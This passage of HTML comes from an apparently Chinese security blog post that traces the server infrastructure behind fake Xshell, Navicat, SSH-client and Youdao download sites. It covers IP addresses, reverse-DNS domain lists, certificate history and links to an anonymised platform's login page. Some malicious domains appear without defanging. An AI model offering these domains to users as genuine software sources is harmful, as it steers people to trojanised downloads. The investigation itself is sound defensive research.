5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">scrt.95271.pw         //空的xshell.php</span><span leaf=""><br/></span><span leaf="">scrt-admin.95271.pw   //laravel应用</span><span leaf=""><br/></span></code></pre><p><img data-imgfileid="100001572" class="rich_pages wxw-img" data-ratio="0.5375722543352601" data-s="300,640" data-type="png" data-w="2422" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a314bea2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9OwxQ9piaia7LysKia4uLtyxiadpp5v1NDmQ88DSwicxa4USsCibBNv1cLHKA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">历史证书也可以关联到 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">xshell.95271[.]pw</span></code><span leaf=""> 。</span></p><p><img data-imgfileid="100001570" class="rich_pages wxw-img" data-ratio="0.25477707006369427" data-s="300,640" data-type="png" data-w="2198" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5dcb9c30&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9l2TurakRswHLFjBk54siaAs9g2iaGRfibabfJgCtdiaSyIG1lZClicadPYA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">xshell.95271[.]pw - 154.19.200.212</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">xshell.95271[.]pw</span></code><span leaf=""> 当前解析到 154.19.200.212。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">（由于一开始并不知道 154.19.200.212 = 154.19.200.213 = 154.19.200.214，运维者解析给每个 IP 的域名也都不一样，所以分析时是 3 个 IP 挨个分析下来的，最后才发现应该是同一台机器。由于每个 IP 绑定的域名都不一样，为了好理清楚逻辑就分开写了。）</span></p><p><img data-imgfileid="100001571" class="rich_pages wxw-img" data-ratio="0.23730684326710816" data-s="300,640" data-type="png" data-w="1812" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5326a37d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9MXnwYcVg0bW6gRXaxRNYxJNB4KmT4HtgMLJJasyyXkRMh2n4hywkuQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">154.19.200.212 反查域名解析记录：</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">cq2381c.icu          //403 有个子域名 r.cq2381c.icu（🌟记住它，返场预定）</span><span leaf=""><br/></span><span leaf="">xshell.95271.pw         //403</span><span leaf=""><br/></span><span leaf="">ddcompany.net         //该站点已经被管理员停止运行</span><span leaf=""><br/></span><span leaf="">www.newmaninternational.net  //一个无关的英文站</span><span leaf=""><br/></span><span leaf="">st.gzkgtjy.cn          //假冒SSH软件</span><span leaf=""><br/></span><span leaf="">cm.186713.tv         //空白但证书正常</span><span leaf=""><br/></span><span leaf="">jiXXXXnshou.com        //该站点已经被管理员停止运行</span><span leaf=""><br/></span><span leaf="">jXX88.net             //跳转 <a href="https://www.fXXXx.cc/r/" target="_blank">https://www.fXXXx.cc/r/</a> XX会登录界面</span><span leaf=""><br/></span><span leaf="">www.186713.tv         //404</span><span leaf=""><br/></span><span leaf="">513625.cc             //假冒navicat</span><span leaf=""><br/></span><span leaf="">www.jiXXXXn580.com       //该站点已经被管理员停止运行</span><span leaf=""><br/></span><span leaf="">jXX686.com          //跳转 <a href="https://www.fXXXx.cc/r/" target="_blank">https://www.fXXXx.cc/r/</a> XX会登录界面</span><span leaf=""><br/></span><span leaf="">www.jiXXXXn519.com      //该站点已经被管理员停止运行</span><span leaf=""><br/></span><span leaf="">www.ddcompany.net       //该站点已经被管理员停止运行</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">VT 也能反查到几个一眼疑似假冒的域名。</span></p><p><img data-imgfileid="100001573" class="rich_pages wxw-img" data-ratio="0.6467661691542289" data-s="300,640" data-type="png" data-w="2412" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=bb32e7f1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY934dEpXSsq5cg747VR7lr10CGsGRV8VkjSYJuo9366rBpmfOdicYQnrA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">例如假冒navicat </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://513625[.]cc" target="_blank">http://513625[.]cc</a></span></code></p><p><img data-imgfileid="100001576" class="rich_pages wxw-img" data-ratio="0.543202416918429" data-s="300,640" data-type="png" data-w="3310" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=08e5e862&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9qJLau1VgHUF9D6ZibaJoZcukIkMhWlBonD8ld3ykJgWyb9aSCKH3B8w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">假冒有道翻译 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://youdoo[.]site/" target="_blank">http://youdoo[.]site/</a></span></code><span leaf="">、</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://youdoo[.]club/" target="_blank">http://youdoo[.]club/</a></span></code><span leaf=""> 。</span></p><p><img data-imgfileid="100001574" class="rich_pages wxw-img" data-ratio="0.564957264957265" data-s="300,640" data-type="png" data-w="2340" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=88abf9ae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9PJhfbbnHqdPdPZTxuHO2Q7BapKKWD3JZ5MIqEEUNpZDBwNriaIBSKaA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">由于 154.19.200.212/3/4 这台机器的 web 服务配置是 &#34;IP 的 443 端口默认指向  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">7zei[.]com</span></code><span leaf=""> 443&#34;，所以上面这些域名如果空有解析记录没有对应的 web 服务配置，那么访问 80 端口的时候等于访问 IP 的 80 端口，IP 的80 端口就会返回 &#34;该站点已经被管理员停止运行&#34;。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">像上面的 navicat、youdao 这种域名解析到 154.19.200.212，访问域名也有对应的服务页面的明显就是有配置的服务。</span></p><p><img data-imgfileid="100001575" class="rich_pages wxw-img" data-ratio="0.5061855670103093" data-s="300,640" data-type="png" data-w="1940" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=7ee74786&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9VV0YnrlDDomS4WRN1XzHYfiaJBRia53D5k2BVB3ySdxmo2dAAV0Q8CzQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而访问 443 端口的时候约等于访问 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://154.19.200.212/3/4" target="_blank">https://154.19.200.212/3/4</a></span></code><span leaf="">  ，但是由于证书对不上，所以会得到这个证书报错。</span></p><p><img data-imgfileid="100001577" class="rich_pages wxw-img" data-ratio="0.3144774688398849" data-s="300,640" data-type="png" data-w="2086" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=333660ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY90HoiapD6YYqK22JjJtLdmZ2tR5XOyics19q8wPGfON0ar6EsA2icKeE9g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">所以像 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://jiXXXXn519[.]com" target="_blank">https://jiXXXXn519[.]com</a></span></code><span leaf="">、</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://jiXXXXnshou[.]com" target="_blank">https://jiXXXXnshou[.]com</a></span></code><span leaf="">、</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://www.jiXXXXn580[.]com" target="_blank">https://www.jiXXXXn580[.]com</a></span></code><span leaf=""> 这几个长得像XX会的业务域名，实际上访问的时候得到的是证书报错版本的 &#34;SSH软件&#34;。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">如果这里有人辩解的话，这种情况是不是完全可以解释为这三个域名的解析是历史 DNS 解析残留，XX会跟假冒软件压根没交集。</span></p><p><img data-imgfileid="100001578" class="rich_pages wxw-img" data-ratio="0.34146341463414637" data-s="300,640" data-type="png" data-w="2050" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=7ed460d9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9YmNjX4ib0K8B6iapwgjY9ovJ3azdyJyT5Gbaz73gPoIN7wNj8eq5UkGg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是除了 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jiXXXXn519[.]com</span></code><span leaf="">、</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jiXXXXnshou[.]com</span></code><span leaf="">、</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jiXXXXn580[.]com</span></code><span leaf=""> 以外，还有 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jXX88[.]net</span></code><span leaf="">、</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jXX686[.]com</span></code><span leaf=""> 可以正常访问并且最终跳转到XX会的登陆页面，这种域名既能解析到IP、域名还能正常工作的情况总不该是域名解析残留了吧。</span></p><p><img data-imgfileid="100001579" class="rich_pages wxw-img" data-ratio="0.58828125" data-s="300,640" data-type="png" data-w="1280" type="block" 